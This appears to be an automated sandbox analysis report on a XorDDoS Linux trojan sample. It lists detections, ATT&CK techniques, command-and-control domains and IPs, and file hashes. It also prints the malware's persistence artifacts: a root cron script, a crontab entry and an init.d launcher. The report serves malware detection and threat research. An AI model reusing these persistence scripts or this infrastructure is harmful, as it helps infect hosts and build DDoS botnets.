Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/pzvxnaaphf, type: DROPPED
Source: Yara match	File source: /usr/bin/oklqvchkds, type: DROPPED
Source: Yara match	File source: /usr/bin/ujuhiugmmi, type: DROPPED
Source: Yara match	File source: /usr/bin/xodlvzjoas, type: DROPPED
Source: Yara match	File source: /usr/bin/zfyjfaoiow, type: DROPPED
Source: Yara match	File source: /usr/bin/hwcijqdbza, type: DROPPED
Source: Yara match	File source: /usr/bin/axppigwavk, type: DROPPED
Source: Yara match	File source: /usr/bin/ggsxjmacxa, type: DROPPED
Source: Yara match	File source: /usr/bin/wjnxqdxblo, type: DROPPED
Source: Yara match	File source: /usr/bin/xocmdvejxu, type: DROPPED
Source: Yara match	File source: /usr/bin/sanzuhhixf, type: DROPPED
Source: Yara match	File source: /usr/bin/zkleyiegjf, type: DROPPED
Source: Yara match	File source: /usr/bin/jflhtagbsg, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Scripting	1 Systemd Service	1 Systemd Service	12 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	2 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fuck.elf	80%	ReversingLabs	Linux.Trojan.XorDDoS
fuck.elf	66%	Virustotal		Browse
fuck.elf	66%	Metadefender		Browse
fuck.elf	100%	Avira	LINUX/Xorddos.cona
fuck.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/usr/bin/ujuhiugmmi	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zkleyiegjf	100%	Avira	LINUX/Xorddos.cona
/usr/bin/hwcijqdbza	100%	Avira	LINUX/Xorddos.cona
/usr/bin/axppigwavk	100%	Avira	LINUX/Xorddos.cona
/usr/bin/jflhtagbsg	100%	Avira	LINUX/Xorddos.cona
/usr/bin/xocmdvejxu	100%	Avira	LINUX/Xorddos.cona
/usr/bin/sanzuhhixf	100%	Avira	LINUX/Xorddos.cona
/usr/bin/xodlvzjoas	100%	Avira	LINUX/Xorddos.cona
/usr/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ggsxjmacxa	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wjnxqdxblo	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zfyjfaoiow	100%	Avira	LINUX/Xorddos.cona
/usr/bin/pzvxnaaphf	100%	Avira	LINUX/Xorddos.cona
/usr/bin/oklqvchkds	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ujuhiugmmi	100%	Joe Sandbox ML
/usr/bin/zkleyiegjf	100%	Joe Sandbox ML
/usr/bin/hwcijqdbza	100%	Joe Sandbox ML
/usr/bin/axppigwavk	100%	Joe Sandbox ML
/usr/bin/jflhtagbsg	100%	Joe Sandbox ML
/usr/bin/xocmdvejxu	100%	Joe Sandbox ML
/usr/bin/sanzuhhixf	100%	Joe Sandbox ML
/usr/bin/xodlvzjoas	100%	Joe Sandbox ML
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/ggsxjmacxa	100%	Joe Sandbox ML
/usr/bin/wjnxqdxblo	100%	Joe Sandbox ML
/usr/bin/zfyjfaoiow	100%	Joe Sandbox ML
/usr/bin/pzvxnaaphf	100%	Joe Sandbox ML
/usr/bin/oklqvchkds	100%	Joe Sandbox ML

Domains

Source	Detection	Scanner	Label	Link
aaa.xxxatat456.com	9%	Virustotal		Browse
gatat456.com	4%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
aaa.xxxatat456.com	54.36.15.96	true	true	9%, Virustotal, Browse	unknown
gatat456.com	unknown	unknown	true	4%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.gnu.org/software/libc/bugs.html	fuck.elf, ujuhiugmmi.11.dr, zkleyiegjf.11.dr, hwcijqdbza.11.dr, axppigwavk.11.dr, jflhtagbsg.11.dr, xocmdvejxu.11.dr, sanzuhhixf.11.dr, xodlvzjoas.11.dr, libudev.so.11.dr, ggsxjmacxa.11.dr, wjnxqdxblo.11.dr, zfyjfaoiow.11.dr, pzvxnaaphf.11.dr, oklqvchkds.11.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
54.36.15.96	aaa.xxxatat456.com	France	16276	OVHFR	true
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
109.202.202.202	cups-lpd.elf	Get hash	malicious	Browse
	8899.elf	Get hash	malicious	Browse
	AXCD.elf	Get hash	malicious	Browse
	mipsel.elf	Get hash	malicious	Browse
	debug.elf	Get hash	malicious	Browse
	linuxd.elf	Get hash	malicious	Browse
	ak.arm6.elf	Get hash	malicious	Browse
	0xE1BN5OpY.elf	Get hash	malicious	Browse
	CTovXLD5xl.elf	Get hash	malicious	Browse
	e2xSI69tiZ.elf	Get hash	malicious	Browse
	arm6-20220921-0518.elf	Get hash	malicious	Browse
	YKqorIzato.elf	Get hash	malicious	Browse
	sYYSRXaKx1.elf	Get hash	malicious	Browse
	foA3JOFeny.elf	Get hash	malicious	Browse
	qNQJMqydDg.elf	Get hash	malicious	Browse
	notabotnet.arm6-20220921-0647.elf	Get hash	malicious	Browse
	rTUb89xkWv.elf	Get hash	malicious	Browse
	JQ8nb4Rm9C.elf	Get hash	malicious	Browse
	AD9sgUtaXP.elf	Get hash	malicious	Browse
	arm5-20220921-0518.elf	Get hash	malicious	Browse
91.189.91.43	cups-lpd.elf	Get hash	malicious	Browse
	8899.elf	Get hash	malicious	Browse
	AXCD.elf	Get hash	malicious	Browse
	mipsel.elf	Get hash	malicious	Browse
	debug.elf	Get hash	malicious	Browse
	linuxd.elf	Get hash	malicious	Browse
	ak.arm6.elf	Get hash	malicious	Browse
	0xE1BN5OpY.elf	Get hash	malicious	Browse
	CTovXLD5xl.elf	Get hash	malicious	Browse
	e2xSI69tiZ.elf	Get hash	malicious	Browse
	arm6-20220921-0518.elf	Get hash	malicious	Browse
	YKqorIzato.elf	Get hash	malicious	Browse
	sYYSRXaKx1.elf	Get hash	malicious	Browse
	foA3JOFeny.elf	Get hash	malicious	Browse
	qNQJMqydDg.elf	Get hash	malicious	Browse
	notabotnet.arm6-20220921-0647.elf	Get hash	malicious	Browse
	rTUb89xkWv.elf	Get hash	malicious	Browse
	JQ8nb4Rm9C.elf	Get hash	malicious	Browse
	AD9sgUtaXP.elf	Get hash	malicious	Browse
	arm5-20220921-0518.elf	Get hash	malicious	Browse
91.189.91.42	cups-lpd.elf	Get hash	malicious	Browse
	8899.elf	Get hash	malicious	Browse
	AXCD.elf	Get hash	malicious	Browse
	mipsel.elf	Get hash	malicious	Browse
	debug.elf	Get hash	malicious	Browse
	linuxd.elf	Get hash	malicious	Browse
	ak.arm6.elf	Get hash	malicious	Browse
	0xE1BN5OpY.elf	Get hash	malicious	Browse
	CTovXLD5xl.elf	Get hash	malicious	Browse
	e2xSI69tiZ.elf	Get hash	malicious	Browse
	arm6-20220921-0518.elf	Get hash	malicious	Browse
	YKqorIzato.elf	Get hash	malicious	Browse
	sYYSRXaKx1.elf	Get hash	malicious	Browse
	foA3JOFeny.elf	Get hash	malicious	Browse
	qNQJMqydDg.elf	Get hash	malicious	Browse
	notabotnet.arm6-20220921-0647.elf	Get hash	malicious	Browse
	rTUb89xkWv.elf	Get hash	malicious	Browse
	JQ8nb4Rm9C.elf	Get hash	malicious	Browse
	AD9sgUtaXP.elf	Get hash	malicious	Browse
	arm5-20220921-0518.elf	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	https://studentwts-my.sharepoint.com/:w:/g/personal/dmoser_student_wts_edu/EQcguIBNAsJEiTeHd1xT3YMB_Ag5_g9gEDo6wvQ7OGTTZw?e=4%3awcnXZL&at=9	Get hash	malicious	Browse	188.165.53.185
	bia.gov-20220921144041.27BF4A1354405DA2@jmepartner.com.htm	Get hash	malicious	Browse	51.68.36.8
	DHL-Express_Shipping.html	Get hash	malicious	Browse	198.27.69.89
	https://www.hamiltonchamber.ca/?ads_click=1&data=33754-33753-33752-16744-1&nonce=013f285da4&redir=https://e4nhh.durrotuaswaja.net/lb7onw	Get hash	malicious	Browse	139.99.9.144
	Factura de proforma .pdf.exe	Get hash	malicious	Browse	51.210.111.113
	srcn3LaVMr.ppt	Get hash	malicious	Browse	178.32.187.39
	srcn3LaVMr.ppt	Get hash	malicious	Browse	178.32.187.39
	ALUMINIUM.exe	Get hash	malicious	Browse	51.210.156.4
	Specific_goods_agreement (uh).js	Get hash	malicious	Browse	87.98.150.35
	RjGM2z2Z3gVHbRl.exe	Get hash	malicious	Browse	51.89.247.113
	Details.xls	Get hash	malicious	Browse	178.32.187.39
	Details.xls	Get hash	malicious	Browse	178.32.187.39
	zS7GFD3BFQ.exe	Get hash	malicious	Browse	178.32.187.39
	CoOv963isE.exe	Get hash	malicious	Browse	178.32.187.39
	sdns.dll	Get hash	malicious	Browse	178.32.187.39
	zkfgineDde.exe	Get hash	malicious	Browse	178.32.187.39
	doc125555.ppt	Get hash	malicious	Browse	178.32.187.39
	ski.kommune.no-20220921033141.21CCC3841652AB91@jmepartner.com.htm	Get hash	malicious	Browse	51.68.36.8
	B2cQy2MsTn.exe	Get hash	malicious	Browse	5.135.247.111
	mywhitecliffe.com-20220921084633.0A83355B8E011ACC@jmepartner.com.htm	Get hash	malicious	Browse	51.68.36.8
INIT7CH	cups-lpd.elf	Get hash	malicious	Browse	109.202.202.202
	8899.elf	Get hash	malicious	Browse	109.202.202.202
	AXCD.elf	Get hash	malicious	Browse	109.202.202.202
	mipsel.elf	Get hash	malicious	Browse	109.202.202.202
	debug.elf	Get hash	malicious	Browse	109.202.202.202
	linuxd.elf	Get hash	malicious	Browse	109.202.202.202
	ak.arm6.elf	Get hash	malicious	Browse	109.202.202.202
	0xE1BN5OpY.elf	Get hash	malicious	Browse	109.202.202.202
	CTovXLD5xl.elf	Get hash	malicious	Browse	109.202.202.202
	e2xSI69tiZ.elf	Get hash	malicious	Browse	109.202.202.202
	arm6-20220921-0518.elf	Get hash	malicious	Browse	109.202.202.202
	YKqorIzato.elf	Get hash	malicious	Browse	109.202.202.202
	sYYSRXaKx1.elf	Get hash	malicious	Browse	109.202.202.202
	foA3JOFeny.elf	Get hash	malicious	Browse	109.202.202.202
	qNQJMqydDg.elf	Get hash	malicious	Browse	109.202.202.202
	notabotnet.arm6-20220921-0647.elf	Get hash	malicious	Browse	109.202.202.202
	rTUb89xkWv.elf	Get hash	malicious	Browse	109.202.202.202
	JQ8nb4Rm9C.elf	Get hash	malicious	Browse	109.202.202.202
	AD9sgUtaXP.elf	Get hash	malicious	Browse	109.202.202.202
	arm5-20220921-0518.elf	Get hash	malicious	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
/etc/cron.hourly/gcc.sh	dkuidbsedp	Get hash	malicious	Browse
	libudev.so	Get hash	malicious	Browse
	23.vir	Get hash	malicious	Browse
	23.vir	Get hash	malicious	Browse
	xor1.o	Get hash	malicious	Browse
	CCCxor.o	Get hash	malicious	Browse
	2BAFxor.o	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	0Xorddos.o	Get hash	malicious	Browse
	x.o	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	XZFWLZVF1Z	Get hash	malicious	Browse
	EgrT0zBhDa	Get hash	malicious	Browse
	4ljhdTTyiA	Get hash	malicious	Browse
	7nJAEBDitl	Get hash	malicious	Browse
	ygljglkjgfg0	Get hash	malicious	Browse
	bVexvNSHcD	Get hash	malicious	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/fuck.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Joe Sandbox View:	Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse Filename: 4ljhdTTyiA, Detection: malicious, Browse Filename: 7nJAEBDitl, Detection: malicious, Browse Filename: ygljglkjgfg0, Detection: malicious, Browse Filename: bVexvNSHcD, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/fuck.elf

Download File

Process:	/tmp/fuck.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.207509699596276
Encrypted:	false
SSDEEP:	6:hUtoFdU9CsKheJtGcBE21YJvmNeMwhN1DzRIGx6Mz1F4:6F0cBEMO1PzuGxz1+
MD5:	E5F62D45CD365CBFAB2AEB0FC489C115
SHA1:	7E2CDD31F4A8E3794B971C258698A6A60712DB2B
SHA-256:	0ED7B122AB9C7A94765A967267932B1CB33B2C95D28F2D85F050992332D4422F
SHA-512:	D0699C627388BE574A85CFD50FC67E0CAEFAF389A988314D38AEA818AAD5CB8D196A077E1348A271396ACB13C0480D758DCB8600D420B349743B5911F80600B8
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: fuck.elf.### BEGIN INIT INFO.# Provides:..fuck.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.fuck.elf.### END INIT INFO.case $1 in.start)../tmp/fuck.elf..;;.stop)..;;.*)../tmp/fuck.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/fuck.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.054229296672174
Encrypted:	false
SSDEEP:	3:VgTWHHLGfiIV:8MLGTV
MD5:	3926C9ED3D7B0E026A4CA61D41965F65
SHA1:	80AA55F24F38DC9343A5B8A88EE23E1349935CE2
SHA-256:	A77A57F03E80F86421EBE66F62DD01B3C7E15E39BD8A4B0C07EA62CA99082989
SHA-512:	39C445284CEE383533ABBC71C9481360CE119928C9BD93D6C69B20561E9556C8158150D264EF6F741BC734BF513010DA37B5467CEAA3DE0AC67B48EEC99B1E7C
Malicious:	false
Reputation:	low
Preview:	iqrdynvstedqusbniyinkdsgrszmfxmp

/usr/bin/axppigwavk

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242851631552554
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1A6:UB1BVpmExDYp38X8LYTWh4fNiGQl/913
MD5:	0B94411D21CCCE661E8CDAA0383FF15F
SHA1:	5FA5FE0760D45D7ABC6F482B7E4CDAD53FB4D2A5
SHA-256:	535B153AB4A64C5473EC996D57832048CCB745DB85A2F490DF37111276EF7364
SHA-512:	F8772D5BCB43191C568E900144FCF82079A2BEBC893C7B8194033DDF484C080CBF5EA46138C1400EFD509B0487D55A701B772CA0B16698CF9E036C88AED9DE13
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/axppigwavk, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/axppigwavk, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/axppigwavk, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/axppigwavk, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/axppigwavk, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/axppigwavk, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/axppigwavk, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/axppigwavk, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ggsxjmacxa

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242847000123013
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AR:UB1BVpmExDYp38X8LYTWh4fNiGQl/91Y
MD5:	7E521AB8F870858FCFE5D5814BDDC362
SHA1:	BD12F9E54973B69ACBA91C757E90C41473CB7471
SHA-256:	6C2ADC80F0AB546297A146AED0471B8816969F35ABB1240314893AE9907FB7D1
SHA-512:	CA478921E2F00CC1C88BC7567BF68E2E3A6BB69154ACC34F2705B5A7A42A62C24AE046404E03C18A48A7386571D6205FDBA8940DE4EE6F50FE6FB56C2F6A2995
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ggsxjmacxa, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ggsxjmacxa, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ggsxjmacxa, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ggsxjmacxa, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ggsxjmacxa, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ggsxjmacxa, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ggsxjmacxa, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ggsxjmacxa, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/hwcijqdbza

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.24284708282309
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AB:UB1BVpmExDYp38X8LYTWh4fNiGQl/918
MD5:	7A51136A3F9C74FF582DADE0A6FF9C1E
SHA1:	D4CD36A4CF5C63DCD87E0ACAD5254DABB0557BF2
SHA-256:	1909B184B16A71286D5706D6850D662A554F00CD5374EDA8D293BE3F210DF969
SHA-512:	78BDCF34E1814E1C0A2A9DD10CA64FDFF4A8A0E10336D265CA987CC6BB5B37725A90BA010E4A5A7177066AECB593C6338BC29695C7318BA11FB6619D47D78933
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hwcijqdbza, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hwcijqdbza, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/hwcijqdbza, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/hwcijqdbza, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/hwcijqdbza, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/hwcijqdbza, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/hwcijqdbza, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/hwcijqdbza, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/jflhtagbsg

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242850880611877
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1A4:UB1BVpmExDYp38X8LYTWh4fNiGQl/91Z
MD5:	3D4268E4B1640CD06ADEF2FD8E500B35
SHA1:	F121F66B4F2E3AC9A0FFE82A3C9C201CC19A33C2
SHA-256:	ADF4C9B3762EB2A1DD90C3E0106CF1C8CA0F4B3B0BF0A74E33FF7E920DF6E086
SHA-512:	B2E70E1AAA2CA6F68A6CC481CE28DE595125962C88A436517CEDBAA9D7E901EC992FF7EFE43D92A41AD5DAF2EE57AEAF3A636DDB0C4FF77ACAE67A38C6AD2EFC
Malicious:	true
